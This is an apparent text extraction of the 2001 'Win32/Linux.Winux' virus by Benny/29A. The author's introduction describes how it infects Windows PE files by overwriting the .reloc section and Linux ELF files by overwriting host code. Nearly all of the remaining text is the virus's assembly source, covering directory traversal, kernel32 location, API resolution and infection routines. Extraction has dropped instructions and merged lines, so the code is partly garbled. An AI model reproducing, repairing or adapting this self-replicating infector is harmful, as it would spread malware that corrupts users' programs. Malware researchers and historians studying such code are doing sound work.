Win32.Winux.txt Wed Nov 21 13:30: ; ; : Win32/Linux.Winux : ; ; : by Benny/29A : ;

Transcription

1 Win32.Winux.txt Wed Nov 21 13:30: : Win32/Linux.Winux : : by Benny/29A : Heya ppl, lemme introduce you my first multi-platform virus, the worlds first PE/ELF infector. The idea of first Win32/Linux virus came to my head when I was learning Linux viruses. I m not Linux expert, I couldn t code for Linux in assembler - I am familiar with Intel syntax, AT&T is a bit chaotic for me. However, I decided to learn more about Linux coding and left my place of newbee. I was always fascinated of Linux scene and low-level programming under Linux but I never knew much about it. I wanted to code virus for Linux and learn from it. But becoz there already exist some viruses and I knew I won t be able to bring any new technique, I decided to code something unique -> Win32/Linux compatible multi-platform infector. And here you can find the result of my trying. Now, after all, I ve got some valuable experiencez and I m glad for that. Coding/debugging in Linux was hard for me, but I had fun and I learned a lot. And that s the most important. - Technical details - The virus itself ain t much. It s not big, it s not complicated, it s not resident nor polymorphic.. I wanted to be the virus like this. Just to show something new, show that something never seen before is possible and how can it be coded. The virus is devided to two partz: Win32 part and Linux part. Every part is able to infect both of PE and ELF filez. This source is designed to be compiled by TASM under Win32, nevertheless it can infect Linux programz and so then it will be able to be executed in Linux environment (and there it is also able to infect Win32 part, which can be executed in Win32 environment etc etc etc...). Win32 part: Virus infects PE filez by overwritting.reloc section, so it does not enlarge host file size. Filez that don t have.reloc section, big enough for virus code, can t be infected (explorer.exe can be used to test infection capabilities). It can pass thru directory tree by well known "dotdot" method ("cd..") and there infects all PE and ELF filez - virus does not check extensionz, it analyses victim s internal format and then decidez whata do. When all filez are passed and/or infected virus will execute host code. Linux part: Virus infects ELF filez by overwritting host code by viral code. The original host code is stored at the end of host file. It can infect all filez (both of PE and ELF) in current directory, also without checking file extensionz. When all filez are passed and/or infected virus will restore host code (overwrite itself by original host code) and execute it. Well, you are probably asking how it is possible that virus can infect Win32 appz from Linux environment and Linux appz from Win32 environment. Yeah, many ppl already asked me. For instance, under some emulator. There exist some emulatorz (win4lin, wine etc..) which are often used to execute Win32 appz under Linux. Also, I know many ppl that have partition specially

2 Win32.Winux.txt Wed Nov 21 13:30: reserved for CD burning, where they store both of Win32 and Linux programz. Virus executed from there has no problemz with infection, heh ) Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and RedHat 7.0, and it worked without any problemz. However, if you will find any problemz, don t by shy and send me a bug report -P - Licence agreement - This virus is covered by GPL - GNU General Public Licence. All crucial facts can be found there. Read it before using! - Last notez - While I was finishing Universe and coding Winux, many personal thingz happened to me. Again such depressive season as only winter can be fell down on me.. I m finishing my high-school, last year, many examz (and I know nothing, you know that feeling, heh :) etc. End of next stage of my life is getting closer and I don t know how will that next one be for me, what it will take and bring to me. I m looking forward to summer, the best season in the year, no depression, no school, no fucking problemz I still have and can t hold them all.. c ya l8r, somewhere in timespace : Benny / 29A +-+ : benny@post.cz (c) March, 2001 : : Czech Republic p.model flat include win32api.inc include useful.inc include mz.inc include pe.inc.data db?.code Start: setup SEH frame call gdelta gdelta: pop ebp ebp=delta offset call get_base get K32 base address call get_apis find addresses of APIz lea call f_infect: eax,[ebp + prev_dir - gdelta] eax MAX_PATH [ebp + a_getcurrentdirectorya - gdelta] get current directory 20 pop ecx 20 passes in directory tree ecx

3 Win32.Winux.txt Wed Nov 21 13:30: direct action - infect all PE filez in directory lea esi,[ebp + WFD - gdelta] WIN32_FIND_DATA structure esi save its *.* search for all filez call [ebp + a_findfirstfilea - gdelta] find first file inc eax je e_find quit if not found dec eax eax save search handle to stack f_next: call wcheckinfect infect found file esi save WFD structure dword ptr [esp+4] and search handle from stack call [ebp + a_findnextfilea - gdelta]find next file test eax,eax jne f_next and infect it f_close:call [ebp + a_findclose - gdelta] close search handle mov esi,[ebp + a_setcurrentdirectorya - gdelta] call esi go upper in directory tree pop ecx loop f_infect and again.. lea eax,[ebp + prev_dir - gdelta] eax call esi go back to original directory remove SEH frame extrn ExitProcess mov eax,offset ExitProcess h original_ep = dword ptr $-4 add eax,400000h image_base = dword ptr $-4 jmp eax and go back to host program INFECT FILE (Win32 version) wcheckinfect Proc setup SEH frame and dword ptr [ebp + sucelf - gdelta],0 test [esi.wfd_dwfileattributes], FILE_ATTRIBUTE_DIRECTORY jne end_seh discard directory entries xor ecx,ecx cmp [esi.wfd_nfilesizehigh],ecx jne end_seh discard files >4GB mov eax,[esi.wfd_nfilesizelow] cmp eax,4000h jb end_seh discard small filez mov [ebp + l_lseek - gdelta],eax xor lea call inc eax,eax eax FILE_ATTRIBUTE_NORMAL OPEN_EXISTING eax eax GENERIC_READ or GENERIC_WRITE eax,[esi.wfd_szfilename] eax [ebp + a_createfilea - gdelta] open file eax

4 Win32.Winux.txt Wed Nov 21 13:30: je end_seh dec eax mov [ebp + hfile - gdelta],eax cdq call cdq xchg jecxz mov edx edx edx PAGE_READWRITE edx eax [ebp + a_createfilemappinga - gdelta] eax,ecx end_cfma [ebp + hmapfile - gdelta],ecx edx edx edx FILE_MAP_WRITE ecx map file to address space call [ebp + a_mapviewoffile - gdelta] xchg eax,ecx jecxz end_mvof mov [ebp + lpfile - gdelta],ecx jmp n_fileopen close_file: h lpfile = dword ptr $-4 unmap file call [ebp + a_unmapviewoffile - gdelta] end_mvof: h hmapfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] end_cfma: mov ecx, h was it linux program (ELF)? sucelf = dword ptr $-4 jecxz c_close no, close that file call dword ptr [ebp + hfile - gdelta] [ebp + a_setfilepointer - gdelta] go to EOF 0 lea eax,[ebp + sucelf - gdelta] eax virtual_end-start h a_mem = dword ptr $-4 dword ptr [ebp + hfile - gdelta] call [ebp + a_writefile - gdelta] write there orig. program part MEM_RELEASE 0 dword ptr [ebp + a_mem - gdelta] call [ebp + a_virtualfree - gdelta] and deallocate used memory c_close: h hfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] close file jmp end_seh and quit n_fileopen: call check_elf

5 Win32.Winux.txt Wed Nov 21 13:30: je winfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne close_file call check_pe jne close_file is it Win32 program (PE)? important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne close_file mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je close_file test ax,image_file_dll jne close_file test ax,image_file_system jne close_file mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne close_file movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je close_file call header&relocs get PE headerz and check for relocs je close_file quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne close_file cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb close_file is it large enough? ad xor mov stosd stosd eax,eax edi,edx erase relocs record call set_alignz align section variable dword ptr [ebp + original_ep - gdelta] dword ptr [ebp + image_base - gdelta] save used variablez mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - gdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - gdelta],eax set variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[ebp + lpfile - gdelta] lea esi,[ebp + Start - gdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus body pop dword ptr [ebp + image_base - gdelta] pop dword ptr [ebp + original_ep - gdelta] restore used variablez or dword ptr [edi.sh_characteristics],image_scn_mem_write jmp close_file set flag and quit wcheckinfect EndP INFECT LINUX PROGRAM (Win32 version) winfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3

6 Win32.Winux.txt Wed Nov 21 13:30: jne close_file call get_elf get elf headerz p_sectionz: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section does EP fit to this section? add esi,edx no, get to next record loop p_sectionz ECX-timez jmp close_file invalid ELF, quit got_section: mov eax,[ebp + Start - gdelta] mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je close_file infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb close_file must be large enough PAGE_READWRITE MEM_RESERVE or MEM_COMMIT eax 0 call [ebp + a_virtualalloc - gdelta] test eax,eax allocate buffer for host code je close_file mov [ebp + a_mem - gdelta],eax ad mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi esi xchg eax,edi rep movsb copy host code to our buffer pop edi lea esi,[ebp + Start - gdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus body add dword ptr [edi+18h],linuxstart-start mov [ebp + sucelf - gdelta],edi jmp close_file set semaphore and quit winfectelf EndP this procedure can rieve API addresses get_apis Proc lea esi,[ebp + crc32s - gdelta] get ptr to CRC32 values of APIs lea edi,[ebp + a_apis - gdelta] where to store API addresses crc32c how many APIs do we need pop ecx in ECX... g_apis: eax save K32 base call get_api stosd save address test eax,eax je q_gpa quit if not found add esi,4 move to next CRC32 value loop g_apis search for API addresses in a loop end_seh:@seh_removeframe remove SEH frame

7 Win32.Winux.txt Wed Nov 21 13:30: restore all registers and quit from procedure jmp end_host quit if error get_apis EndP this procedure can rieve address of given API get_api Proc ad store all setup SEH frame mov edi,[eax.mz_lfanew] move to PE header add edi,eax... mov ecx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_size] jecxz end_gpa quit if no exports mov ebx,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] mov edx,eax get address of export table add edx,[ebx.ed_addressofnames] address of API names mov ecx,[ebx.ed_numberofnames] number of API names mov edi,edx dword ptr [esi] save CRC32 to stack mov ebp,eax xor eax,eax APIname: eax mov esi,ebp get base add esi,[edx+eax*4] move to API name esi save go to the end of string sub esi,[esp] get string size mov edi,esi move it to EDI pop esi restore address of API name call CRC32 calculate CRC32 of API name cmp eax,[esp+4] is it right API? je g_name yeah, we got it inc eax increment counter loop APIname and search for next API name end_gpa:xor eax, eax set flag remove SEH frame mov [esp.pushad_eax],eax save value to stack restore all registers quit from procedure g_name: pop edx mov edx,ebp add edx,[ebx.ed_addressofordinals] movzx eax,word ptr [edx+eax*2] cmp eax,[ebx.ed_numberoffunctions] jae end_gpa-1 mov edx,ebp base of K32 add edx,[ebx.ed_addressoffunctions] address of API functions add ebp,[edx+eax*4] get API function address xchg eax,ebp we got address of API in EAX jmp ok_gpa quit get_api EndP this procedure can rieve base address of K32 get_base Proc ebp store EBP call gdlt get delta offset gdlt: pop ebp to EBP mov eax, h get lastly used address last_kern = dword ptr $-4 call check_kern is this address valid?

8 Win32.Winux.txt Wed Nov 21 13:30: jecxz end_gb yeah, we got the address call gb_table jump over the address table dd 077E00000h NT/W2k dd 077E80000h NT/W2k dd 077ED0000h NT/W2k dd 077F00000h NT/W2k dd 0BFF70000h 95/98 gb_table: pop edi get pointer to address table 4 get number of items in the table pop esi to ESI gbloop: mov eax,[edi+esi*4] get item call check_kern is address valid? jecxz end_gb yeah, we got the valid address dec esi decrement ESI test esi,esi end of table? jne gbloop nope, try next item call scan_kern scan the address space for K32 end_gb: pop ebp restore EBP quit check_kern: check if K32 address is valid mov ecx,eax make ECX!= 0 ad store all setup SEH frame movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne end_ck nope mov ebx,[eax.mz_lfanew] get pointer to PE header add ebx,eax normalize it mov ebx,[ebx] get four bytes add ebx,-"ep" is it PE header? jne end_ck nope xor ecx,ecx we got K32 base address mov [ebp + last_kern - gdlt],eax save K32 base address remove SEH frame mov [esp.pushad_ecx],ecx save ECX restore all registers if ECX == 0, address was found SEH_hndlr macro macro for remove SEH frame restore all registers add dword ptr [ebp + baddr - gdlt],1000h explore next page jmp bck continue execution endm scan_kern: scan address space for K32 bck: ad store all setup SEH frame mov eax, h starting/last address baddr = dword ptr $-4 movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne pg_flt nope mov edi,[eax.mz_lfanew] get pointer to PE header add edi,eax normalize it mov ebx,[edi] get four bytes add ebx,-"ep" is it PE header? jne pg_flt nope mov ebx,eax mov esi,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] add esi,[ebx.ed_name] mov esi,[esi] add esi,- NREK je end_sk

9 Win32.Winux.txt Wed Nov 21 13:30: pg_flt: xor ecx,ecx we got K32 base address mov [ecx],esi generate PAGE FAULT! search again... end_sk: mov [ebp + last_kern - gdlt],eax save K32 base remove SEH frame mov [esp.pushad_eax],eax save EAX - K32 base get_base EndP restore all registers CRC32: ecx procedure for calculating CRC32s edx at run-time ebx xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx pop ecx signature db 0, [Win32/Linux.Winux] multi-platform virus by Benny/29A,0 little signature of mine -) Viral entrypoint in Linux programz LinuxStart: eax reserve variable for urn to host ad mov ebx,[esp.cpushad+8] get command line call lgdelta lgdelta:pop ebp ebp=delta offset mov ecx,end_end_lhost-end_lhost sub esp,ecx mov edi,esp lea esi,[ebp + end_lhost - lgdelta] rep movsb copy virus to stack and jump there jmp esp (becoz we need to restore host code back) end_lhost Proc ebx 125

10 Win32.Winux.txt Wed Nov 21 13:30: lea ebx,[ebp + Start - lgdelta] and ebx,0fffff000h mov ecx,3000h mov edx,7 int 80h deprotect code section pop ebx 5 xor ecx,ecx int 80h open host file xchg eax,ebx test ebx,ebx jns read_host q_host: xor eax,eax inc eax -1 pop ebx int 80h quit if error read_host: 19 mov ecx, h l_lseek = dword ptr $-4 cdq int 80h seek to saved host code (EOF - some bytez) test eax,eax js q_host ad 5 call cur_dir db.,0 cur_dir:pop ebx xor ecx,ecx cdq int 80h get current directory descriptor xchg eax,ebx inf_dir: 89 lea ecx,[ebp + WFD - lgdelta] int 80h get file from directory xchg eax,ecx jecxz cldir no more filez.. add eax,10 call lcheckinfect try to infect it jmp inf_dir and look for another file cldir: 6 int 80h close directory descriptor 3 lea ecx,[ebp + Start - lgdelta] mov edi,ecx mov edx,virtual_end-start int 80h restore host code test eax,eax js q_host 6 int 80h close host file descriptor add esp,end_end_lhost-end_lhost mov [esp.cpushad],edi write host entrypoint address

11 Win32.Winux.txt Wed Nov 21 13:30: and jump to there INFECT FILE (Linux version) lcheckinfect Proc ad xchg eax,ebx 5 cdq inc edx inc edx mov ecx,edx int 80h open file xchg eax,ebx test ebx,ebx jns c_open c_open: mov [ebp + f_handle - lgdelta],ebx 19 xor ecx,ecx int 80h seek to EOF = get file size mov [ebp + l_lseek - lgdelta],eax save it ecx ebx inc ecx ecx inc ecx inc ecx ecx eax xor ecx,ecx ecx mov ebx,esp 90 int 80h map file to address space add esp,24 cmp eax,0fffff000h jbe c_mmap quit if error jmp c_file c_mmap: mov ecx,eax mov [ebp + fm_handle - lgdelta],eax ad call check_elf je linfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne c_mfile call check_pe jne c_mfile is it Win32 program (PE)? some important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne c_mfile mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je c_mfile test ax,image_file_dll jne c_mfile test ax,image_file_system jne c_mfile mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne c_mfile

12 Win32.Winux.txt Wed Nov 21 13:30: movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je c_mfile call header&relocs get PE headerz and check for relocs je c_mfile quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne c_mfile cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb c_mfile is it large enough? ad xor mov stosd stosd eax,eax edi,edx clear relocs record call set_alignz align section variable mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - lgdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - lgdelta],eax set some important variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[esp+24] lea esi,[ebp + Start - lgdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus code or dword ptr [edi.sh_characteristics],image_scn_mem_write set flag c_mfile: 91 int 80h unmap file c_file: 6 mov ebx,[ebp + f_handle - lgdelta] int 80h close file descriptor and quit lcheckinfect EndP INFECT LINUX PROGRAM (Linux version) linfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3 jne c_mfile call get_elf get ELF headerz p_sectionz2: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section2 does EP fit to this section? add esi,edx no, get to next record loop p_sectionz2 ECX-timez jmp c_mfile invalid ELF, quit got_section2: mov eax,[ebp + Start - lgdelta]

13 Win32.Winux.txt Wed Nov 21 13:30: mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je c_mfile infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb c_mfile is it large enough? sub esp,eax create buffer in stack mov [ebp + s_mem - lgdelta],eax add dword ptr [edi+18h],linuxstart-start mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi mov eax,esi mov edi,esp rep movsb copy original host code there mov edi,eax lea esi,[ebp + Start - lgdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus 91 mov ebx,[ebp + fm_handle - lgdelta] int 80h unmap file 19 mov ebx,[ebp + f_handle - lgdelta] xor ecx,ecx cdq inc edx inc edx int 80h go to EOF 4 mov ecx,esp mov edx,virtual_end-start int 80h write there original host code add esp,[ebp + s_mem - lgdelta] correct stack jmp c_file and close the file linfectelf EndP check if it is Linux program (ELF) check_elf Proc mov eax,[ecx] eax add eax,-464c457fh check_elf EndP check if it is Win32 program (PE) check_pe Proc mov eax,[ecx.mz_lfanew] add eax,ecx xchg eax,esi mov eax,[esi] add eax,-image_nt_signature check_pe EndP

14 Win32.Winux.txt Wed Nov 21 13:30: get some variablez and check for relocationz in PE file header&relocs Proc imul eax,eax,image_sizeof_section_header movzx edx,word ptr [esi.nt_fileheader.fh_sizeofoptionalheader] lea edi,[eax+edx+image_sizeof_file_header+4] add edi,esi lea edx,[esi.nt_optionalheader.oh_datadirectory.de_basereloc.dd_virtualaddres s] mov eax,[edx] test eax,eax header&relocs EndP align section variable set_alignz Proc mov eax,virtual_end-start cmp eax,[edi.sh_virtualsize] jb o_vs mov ecx,[esi.nt_optionalheader.oh_sectionalignment] cdq div ecx test edx,edx je o_al inc eax o_al: mul ecx mov [edi.sh_virtualsize],eax o_vs: set_alignz EndP get some important variablez from Linux program (ELF) get_elf Proc mov ebx,[edi+18h] EP mov esi,[edi+20h] section header add esi,edi normalize movzx edx,word ptr [edi+2eh] size of section header movzx ecx,word ptr [edi+30h] number of sectionz get_elf EndP end_end_lhost: end_lhost EndP gpl db This GNU program is covered by GPL.,0 licence agreement -) CRC32s of used APIz crc32s: dd 0AE17EBEFh FindFirstFileA dd 0AA700106h FindNextFileA dd 0C200BE21h FindClose dd 08C892DDFh CreateFileA dd 096B2D96Ch CreateFileMappingA dd 0797B49ECh MapViewOfFile dd B42h UnmapViewOfFile dd A9Dh CloseHandle dd Eh VirtualAlloc dd 02AAD1211h VirtualFree dd h WriteFile dd D42h SetFilePointer dd 0EBC6C18Bh GetCurrentDirectoryA dd 0B2DBD7DCh SetCurrentDirectoryA dd 07495B3ADh OutputDebugStringA crc32c = ($-crc32s)/4 number of APIz virus_end:

15 Win32.Winux.txt Wed Nov 21 13:30: addresses of APIz a_apis: a_findfirstfilea dd? a_findnextfilea dd? a_findclose dd? a_createfilea dd? a_createfilemappinga dd? a_mapviewoffile dd? a_unmapviewoffile dd? a_closehandle dd? a_virtualalloc dd? a_virtualfree dd? a_writefile dd? a_setfilepointer dd? a_getcurrentdirectorya dd? a_setcurrentdirectorya dd? a_outputdebugstringa dd? f_handle dd? file handle fm_handle dd? file mapping handle s_mem dd? size of host code (for stack manipulatio nz) WFD WIN32_FIND_DATA? WIN32_FIND_DATA structure prev_dir db MAX_PATH dup (?)original directory virtual_end: ends End Start that s all folx, wasn t that kewl? -)